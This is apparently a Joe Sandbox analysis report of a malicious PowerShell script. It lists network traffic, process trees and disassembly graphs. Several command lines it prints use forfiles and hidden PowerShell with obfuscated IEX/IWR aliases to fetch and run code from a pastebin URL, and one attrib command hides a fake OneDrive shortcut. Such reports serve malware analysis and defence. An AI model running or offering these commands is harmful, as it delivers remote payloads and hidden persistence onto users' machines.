                                                                              2024-10-15 13:54:08 UTC1356INHTTP/1.1 204 No Content
                                                                              Date: Tue, 15 Oct 2024 13:54:08 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              set-cookie: __dcfduid=f2bd4dc08afc11ef92668654655dbc7f; Expires=Sun, 14-Oct-2029 13:54:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                              x-ratelimit-limit: 5
                                                                              x-ratelimit-remaining: 4
                                                                              x-ratelimit-reset: 1729000449
                                                                              x-ratelimit-reset-after: 1
                                                                              via: 1.1 google
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2FUUh9x30TEJdjiMTvrr%2F5OsZ18O5GckfCFnlSZuY6kIbi5S6p0I4HskBdzIFvZD1aLJPRQke%2Fxn56pb4DT38oJVzqAq6rZ2dNvbeDzRrDuS5L1H6qYNTs%2BjqKly"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                              Set-Cookie: __sdcfduid=f2bd4dc08afc11ef92668654655dbc7fca8e82694219a1a93a155567a305f43bdaa25071fd3ad84b4a1a1798d83973ba; Expires=Sun, 14-Oct-2029 13:54:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              Set-Cookie: __cfruid=5c6b0a66b89033257b144fd7b0c8cf669f14427e-1729000448; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                              2024-10-15 13:54:08 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 47 69 64 6c 4f 6c 4b 6c 63 38 66 34 30 63 35 63 79 4c 30 62 57 59 34 41 6a 4c 46 73 45 64 6a 4e 5f 67 44 34 68 31 4b 6b 4e 67 34 2d 31 37 32 39 30 30 30 34 34 38 30 38 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 39 66 37 39 34 66 34 37 35 35 2d 44 46 57 0d 0a 0d 0a
                                                                              Data Ascii: Set-Cookie: _cfuvid=GidlOlKlc8f40c5cyL0bWY4AjLFsEdjN_gD4h1KkNg4-1729000448086-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304c9f794f4755-DFW


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:1
                                                                              Start time:09:53:16
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1"
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:09:53:16
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:09:53:41
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                              Imagebase:0x7ff6b4970000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:09:53:41
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:09:53:41
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:09:53:42
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:09:53:42
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\attrib.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                              Imagebase:0xfa0000
                                                                              File size:23'040 bytes
                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:09:53:49
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                              Imagebase:0x7ff6b4970000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:09:53:49
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:09:53:50
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:09:53:50
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:3.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:3
                                                                                Total number of Limit Nodes:0
                                                                                execution_graph 12362 7ffaac498e54 12363 7ffaac498e5d LoadLibraryExW 12362->12363 12365 7ffaac498f0d 12363->12365

                                                                                Executed Functions

                                                                                Function 00007FFAAC48DA2D Relevance: 3.1, Strings: 2, Instructions: 560COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 166 7ffaac48da2d-7ffaac48da49 168 7ffaac48dab5-7ffaac48db41 166->168 169 7ffaac48da4b-7ffaac48da76 166->169 175 7ffaac48db43-7ffaac48dbae 168->175 176 7ffaac48dbac-7ffaac48dbae 168->176 177 7ffaac48dbb5-7ffaac48dcb7 175->177 176->177 192 7ffaac48dd23 177->192 193 7ffaac48dcb9-7ffaac48dcc2 177->193 195 7ffaac48dd25-7ffaac48dd4a 192->195 193->192 196 7ffaac48dcc4-7ffaac48dcd0 193->196 202 7ffaac48ddb6 195->202 203 7ffaac48dd4c-7ffaac48dd55 195->203 197 7ffaac48dcd2-7ffaac48dce4 196->197 198 7ffaac48dd09-7ffaac48dd21 196->198 199 7ffaac48dce6 197->199 200 7ffaac48dce8-7ffaac48dcfb 197->200 198->195 199->200 200->200 204 7ffaac48dcfd-7ffaac48dd05 200->204 206 7ffaac48ddb8-7ffaac48de32 202->206 203->202 205 7ffaac48dd57-7ffaac48dd63 203->205 204->198 207 7ffaac48dd65-7ffaac48dd77 205->207 208 7ffaac48dd9c-7ffaac48ddb4 205->208 215 7ffaac48de34-7ffaac48de37 206->215 209 7ffaac48dd79 207->209 210 7ffaac48dd7b-7ffaac48dd8e 207->210 208->206 209->210 210->210 212 7ffaac48dd90-7ffaac48dd98 210->212 212->208 216 7ffaac48de40-7ffaac48de60 215->216 217 7ffaac48de62-7ffaac48de6c 216->217 218 7ffaac48dece 216->218 217->218 219 7ffaac48de6e-7ffaac48de7b 217->219 220 7ffaac48ded0-7ffaac48def9 218->220 221 7ffaac48deb4-7ffaac48decc 219->221 222 7ffaac48de7d-7ffaac48de8f 219->222 227 7ffaac48df63 220->227 228 7ffaac48defb-7ffaac48df06 220->228 221->220 223 7ffaac48de93-7ffaac48dea6 222->223 224 7ffaac48de91 222->224 223->223 226 7ffaac48dea8-7ffaac48deb0 223->226 224->223 226->221 230 7ffaac48df65-7ffaac48df7d 227->230 228->227 229 7ffaac48df08-7ffaac48df16 228->229 231 7ffaac48df18-7ffaac48df2a 229->231 232 7ffaac48df4f-7ffaac48df61 229->232 237 7ffaac48df84-7ffaac48dff6 230->237 234 7ffaac48df2c 231->234 235 7ffaac48df2e-7ffaac48df41 231->235 232->230 234->235 235->235 236 7ffaac48df43-7ffaac48df4b 235->236 236->232 238 7ffaac48dffc-7ffaac48e00b 237->238 239 7ffaac48e013-7ffaac48e078 call 7ffaac48e094 238->239 240 7ffaac48e00d 238->240 247 7ffaac48e07a 239->247 248 7ffaac48e07f-7ffaac48e093 239->248 240->239 247->248
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784749175.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac480000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: peA~$peA~
                                                                                • API String ID: 0-306735412
                                                                                • Opcode ID: c2f3104a29cdddb184381528ccf9843d1c90d209da0519fe6c51b2e6d75e02f4
                                                                                • Instruction ID: ca2b2bf90feebfbf97240781b120ba142ea0bb3bd9189f56729b944e0353b4a1
                                                                                • Opcode Fuzzy Hash: c2f3104a29cdddb184381528ccf9843d1c90d209da0519fe6c51b2e6d75e02f4
                                                                                • Instruction Fuzzy Hash: D802F431909A4A8FEBA8EF28D8597F837D0FF55314F14827AD44DCB292CF34A9448B85
                                                                                Function 00007FFAAC48DA80 Relevance: 3.0, Strings: 2, Instructions: 518COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 249 7ffaac48da80-7ffaac48db41 260 7ffaac48db43-7ffaac48dbae 249->260 261 7ffaac48dbac-7ffaac48dbae 249->261 262 7ffaac48dbb5-7ffaac48dcb7 260->262 261->262 277 7ffaac48dd23 262->277 278 7ffaac48dcb9-7ffaac48dcc2 262->278 280 7ffaac48dd25-7ffaac48dd4a 277->280 278->277 281 7ffaac48dcc4-7ffaac48dcd0 278->281 287 7ffaac48ddb6 280->287 288 7ffaac48dd4c-7ffaac48dd55 280->288 282 7ffaac48dcd2-7ffaac48dce4 281->282 283 7ffaac48dd09-7ffaac48dd21 281->283 284 7ffaac48dce6 282->284 285 7ffaac48dce8-7ffaac48dcfb 282->285 283->280 284->285 285->285 289 7ffaac48dcfd-7ffaac48dd05 285->289 291 7ffaac48ddb8-7ffaac48de32 287->291 288->287 290 7ffaac48dd57-7ffaac48dd63 288->290 289->283 292 7ffaac48dd65-7ffaac48dd77 290->292 293 7ffaac48dd9c-7ffaac48ddb4 290->293 300 7ffaac48de34-7ffaac48de37 291->300 294 7ffaac48dd79 292->294 295 7ffaac48dd7b-7ffaac48dd8e 292->295 293->291 294->295 295->295 297 7ffaac48dd90-7ffaac48dd98 295->297 297->293 301 7ffaac48de40-7ffaac48de60 300->301 302 7ffaac48de62-7ffaac48de6c 301->302 303 7ffaac48dece 301->303 302->303 304 7ffaac48de6e-7ffaac48de7b 302->304 305 7ffaac48ded0-7ffaac48def9 303->305 306 7ffaac48deb4-7ffaac48decc 304->306 307 7ffaac48de7d-7ffaac48de8f 304->307 312 7ffaac48df63 305->312 313 7ffaac48defb-7ffaac48df06 305->313 306->305 308 7ffaac48de93-7ffaac48dea6 307->308 309 7ffaac48de91 307->309 308->308 311 7ffaac48dea8-7ffaac48deb0 308->311 309->308 311->306 315 7ffaac48df65-7ffaac48df7d 312->315 313->312 314 7ffaac48df08-7ffaac48df16 313->314 316 7ffaac48df18-7ffaac48df2a 314->316 317 7ffaac48df4f-7ffaac48df61 314->317 322 7ffaac48df84-7ffaac48dff6 315->322 319 7ffaac48df2c 316->319 320 7ffaac48df2e-7ffaac48df41 316->320 317->315 319->320 320->320 321 7ffaac48df43-7ffaac48df4b 320->321 321->317 323 7ffaac48dffc-7ffaac48e00b 322->323 324 7ffaac48e013-7ffaac48e078 call 7ffaac48e094 323->324 325 7ffaac48e00d 323->325 332 7ffaac48e07a 324->332 333 7ffaac48e07f-7ffaac48e093 324->333 325->324 332->333
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784749175.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac480000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: peA~$peA~
                                                                                • API String ID: 0-306735412
                                                                                • Opcode ID: 234465a41752b92d28f6f105c372940976f636d0dead29518f043e067f9a92ef
                                                                                • Instruction ID: 54b02696018f6a9711bef23a40a614edab6d12be4ce53f0a4112a444bafb0159
                                                                                • Opcode Fuzzy Hash: 234465a41752b92d28f6f105c372940976f636d0dead29518f043e067f9a92ef
                                                                                • Instruction Fuzzy Hash: D402D130909A4A8FEBA8EF28D8597F937D0FF55314F14827AD45EC7292DE34A9448B81
                                                                                Function 00007FFAAC48DAB0 Relevance: 3.0, Strings: 2, Instructions: 504COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 334 7ffaac48dab0-7ffaac48db41 339 7ffaac48db43-7ffaac48dbae 334->339 340 7ffaac48dbac-7ffaac48dbae 334->340 341 7ffaac48dbb5-7ffaac48dcb7 339->341 340->341 356 7ffaac48dd23 341->356 357 7ffaac48dcb9-7ffaac48dcc2 341->357 359 7ffaac48dd25-7ffaac48dd4a 356->359 357->356 360 7ffaac48dcc4-7ffaac48dcd0 357->360 366 7ffaac48ddb6 359->366 367 7ffaac48dd4c-7ffaac48dd55 359->367 361 7ffaac48dcd2-7ffaac48dce4 360->361 362 7ffaac48dd09-7ffaac48dd21 360->362 363 7ffaac48dce6 361->363 364 7ffaac48dce8-7ffaac48dcfb 361->364 362->359 363->364 364->364 368 7ffaac48dcfd-7ffaac48dd05 364->368 370 7ffaac48ddb8-7ffaac48de32 366->370 367->366 369 7ffaac48dd57-7ffaac48dd63 367->369 368->362 371 7ffaac48dd65-7ffaac48dd77 369->371 372 7ffaac48dd9c-7ffaac48ddb4 369->372 379 7ffaac48de34-7ffaac48de37 370->379 373 7ffaac48dd79 371->373 374 7ffaac48dd7b-7ffaac48dd8e 371->374 372->370 373->374 374->374 376 7ffaac48dd90-7ffaac48dd98 374->376 376->372 380 7ffaac48de40-7ffaac48de60 379->380 381 7ffaac48de62-7ffaac48de6c 380->381 382 7ffaac48dece 380->382 381->382 383 7ffaac48de6e-7ffaac48de7b 381->383 384 7ffaac48ded0-7ffaac48def9 382->384 385 7ffaac48deb4-7ffaac48decc 383->385 386 7ffaac48de7d-7ffaac48de8f 383->386 391 7ffaac48df63 384->391 392 7ffaac48defb-7ffaac48df06 384->392 385->384 387 7ffaac48de93-7ffaac48dea6 386->387 388 7ffaac48de91 386->388 387->387 390 7ffaac48dea8-7ffaac48deb0 387->390 388->387 390->385 394 7ffaac48df65-7ffaac48df7d 391->394 392->391 393 7ffaac48df08-7ffaac48df16 392->393 395 7ffaac48df18-7ffaac48df2a 393->395 396 7ffaac48df4f-7ffaac48df61 393->396 401 7ffaac48df84-7ffaac48dff6 394->401 398 7ffaac48df2c 395->398 399 7ffaac48df2e-7ffaac48df41 395->399 396->394 398->399 399->399 400 7ffaac48df43-7ffaac48df4b 399->400 400->396 402 7ffaac48dffc-7ffaac48e00b 401->402 403 7ffaac48e013-7ffaac48e078 call 7ffaac48e094 402->403 404 7ffaac48e00d 402->404 411 7ffaac48e07a 403->411 412 7ffaac48e07f-7ffaac48e093 403->412 404->403 411->412
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784749175.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac480000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: peA~$peA~
                                                                                • API String ID: 0-306735412
                                                                                • Opcode ID: 85cfcccc7c230ff66657b53d3bb9eb01fc274292eede3bfecaf3d64f441dbbe0
                                                                                • Instruction ID: db9e8827b46a46577a6030e8477bf86541f21bfc53a50c41a0e0a72d482e304f
                                                                                • Opcode Fuzzy Hash: 85cfcccc7c230ff66657b53d3bb9eb01fc274292eede3bfecaf3d64f441dbbe0
                                                                                • Instruction Fuzzy Hash: 5102D030909A4E8FEBA8EF28D8597F937D1FF55304F14827AD45EC7292CE34A9448B81
                                                                                Function 00007FFAAC48E982 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 572 7ffaac48e982-7ffaac48e98f 573 7ffaac48e99a-7ffaac48ea67 572->573 574 7ffaac48e991-7ffaac48e999 572->574 578 7ffaac48ead3 573->578 579 7ffaac48ea69-7ffaac48ea72 573->579 574->573 581 7ffaac48ead5-7ffaac48eafa 578->581 579->578 580 7ffaac48ea74-7ffaac48ea80 579->580 582 7ffaac48ea82-7ffaac48ea94 580->582 583 7ffaac48eab9-7ffaac48ead1 580->583 588 7ffaac48eb66 581->588 589 7ffaac48eafc-7ffaac48eb05 581->589 584 7ffaac48ea96 582->584 585 7ffaac48ea98-7ffaac48eaab 582->585 583->581 584->585 585->585 587 7ffaac48eaad-7ffaac48eab5 585->587 587->583 590 7ffaac48eb68-7ffaac48eb8d 588->590 589->588 591 7ffaac48eb07-7ffaac48eb13 589->591 598 7ffaac48ebfb 590->598 599 7ffaac48eb8f-7ffaac48eb99 590->599 592 7ffaac48eb15-7ffaac48eb27 591->592 593 7ffaac48eb4c-7ffaac48eb64 591->593 594 7ffaac48eb29 592->594 595 7ffaac48eb2b-7ffaac48eb3e 592->595 593->590 594->595 595->595 597 7ffaac48eb40-7ffaac48eb48 595->597 597->593 600 7ffaac48ebfd-7ffaac48ec2b 598->600 599->598 601 7ffaac48eb9b-7ffaac48eba8 599->601 607 7ffaac48ec9b 600->607 608 7ffaac48ec2d-7ffaac48ec38 600->608 602 7ffaac48ebaa-7ffaac48ebbc 601->602 603 7ffaac48ebe1-7ffaac48ebf9 601->603 605 7ffaac48ebbe 602->605 606 7ffaac48ebc0-7ffaac48ebd3 602->606 603->600 605->606 606->606 609 7ffaac48ebd5-7ffaac48ebdd 606->609 611 7ffaac48ec9d-7ffaac48ed8a 607->611 608->607 610 7ffaac48ec3a-7ffaac48ec48 608->610 609->603 612 7ffaac48ec4a-7ffaac48ec5c 610->612 613 7ffaac48ec81-7ffaac48ec99 610->613 622 7ffaac48ed92-7ffaac48edac 611->622 623 7ffaac48ed8c 611->623 614 7ffaac48ec5e 612->614 615 7ffaac48ec60-7ffaac48ec73 612->615 613->611 614->615 615->615 617 7ffaac48ec75-7ffaac48ec7d 615->617 617->613 626 7ffaac48edb5-7ffaac48edf4 call 7ffaac48ee10 622->626 623->622 630 7ffaac48edf6 626->630 631 7ffaac48edfb-7ffaac48ee0f 626->631 630->631
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784749175.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac480000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: peA~$peA~
                                                                                • API String ID: 0-306735412
                                                                                • Opcode ID: ab90169171663c8f9c6df68297856a4961f263dbcec2a3ed6dd2cee7a29109d5
                                                                                • Instruction ID: 5e99e615b289243ae6d9d97e5b22354acd46b5485f5430abfce2b72ca21f959a
                                                                                • Opcode Fuzzy Hash: ab90169171663c8f9c6df68297856a4961f263dbcec2a3ed6dd2cee7a29109d5
                                                                                • Instruction Fuzzy Hash: 5DE1B330908A4E8FEBA8DF28C8597F97BD1FB55310F14826ED85EC7291DE74D9448B81
                                                                                Function 00007FFAAC559902 Relevance: 6.7, Strings: 5, Instructions: 474COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 7ffaac559902-7ffaac559907 1 7ffaac559949-7ffaac559997 0->1 2 7ffaac559909-7ffaac559936 0->2 6 7ffaac55999d-7ffaac5599a7 1->6 7 7ffaac559c67-7ffaac559c9d 1->7 2->1 8 7ffaac5599a9-7ffaac5599c1 6->8 9 7ffaac5599c3-7ffaac5599d0 6->9 19 7ffaac559c9f-7ffaac559cc3 7->19 20 7ffaac559cc8-7ffaac559d08 7->20 8->9 15 7ffaac5599d6-7ffaac5599d9 9->15 16 7ffaac559c03-7ffaac559c0d 9->16 15->16 18 7ffaac5599df-7ffaac5599eb 15->18 21 7ffaac559c0f-7ffaac559c1b 16->21 22 7ffaac559c1c-7ffaac559c64 16->22 18->7 23 7ffaac5599f1-7ffaac5599fb 18->23 19->20 22->7 27 7ffaac5599fd-7ffaac559a0a 23->27 28 7ffaac559a14-7ffaac559a19 23->28 27->28 36 7ffaac559a0c-7ffaac559a12 27->36 28->16 31 7ffaac559a1f-7ffaac559a24 28->31 34 7ffaac559a3f 31->34 35 7ffaac559a26-7ffaac559a3d 31->35 39 7ffaac559a41-7ffaac559a43 34->39 35->39 36->28 39->16 41 7ffaac559a49-7ffaac559a4c 39->41 42 7ffaac559a4e-7ffaac559a71 41->42 43 7ffaac559a73 41->43 44 7ffaac559a75-7ffaac559a77 42->44 43->44 44->16 46 7ffaac559a7d-7ffaac559a98 44->46 50 7ffaac559a9a-7ffaac559ac2 46->50 50->16 54 7ffaac559ac8-7ffaac559ad8 50->54 55 7ffaac559ada-7ffaac559ae4 54->55 56 7ffaac559ae8 54->56 57 7ffaac559ae6 55->57 58 7ffaac559b04-7ffaac559b0f 55->58 60 7ffaac559aed-7ffaac559afa 56->60 57->60 58->50 61 7ffaac559b11-7ffaac559b22 58->61 60->58 64 7ffaac559afc-7ffaac559b02 60->64 61->56 63 7ffaac559b24-7ffaac559b2e 61->63 65 7ffaac559b30-7ffaac559b46 63->65 66 7ffaac559b47-7ffaac559bb5 63->66 64->58 65->66 75 7ffaac559bb7-7ffaac559bd3 66->75 76 7ffaac559bd5-7ffaac559bd6 66->76 75->76 78 7ffaac559bde-7ffaac559bea 76->78 80 7ffaac559bec-7ffaac559bf0 78->80 81 7ffaac559bf2-7ffaac559bf7 78->81 82 7ffaac559bf8-7ffaac559c02 80->82 81->82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785245696.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac550000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$6$r6$r6$r6
                                                                                • API String ID: 0-4263799821
                                                                                • Opcode ID: a258bcf3770d49fcb1f966f5efb4639bdfb408f042bacaa6c1518f91eb1c9ba0
                                                                                • Instruction ID: a33c4c4ae1c346d234238ac1206c0ed9c5cf56d563bdd2a372d6704ee1a6c745
                                                                                • Opcode Fuzzy Hash: a258bcf3770d49fcb1f966f5efb4639bdfb408f042bacaa6c1518f91eb1c9ba0
                                                                                • Instruction Fuzzy Hash: F7E11571A0DB4E8FFB94DB2898555B87BD5EF56310B1841BEE00DC7192DA2AEC0AC781
                                                                                Function 00007FFAAC55993D Relevance: 5.3, Strings: 4, Instructions: 314COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
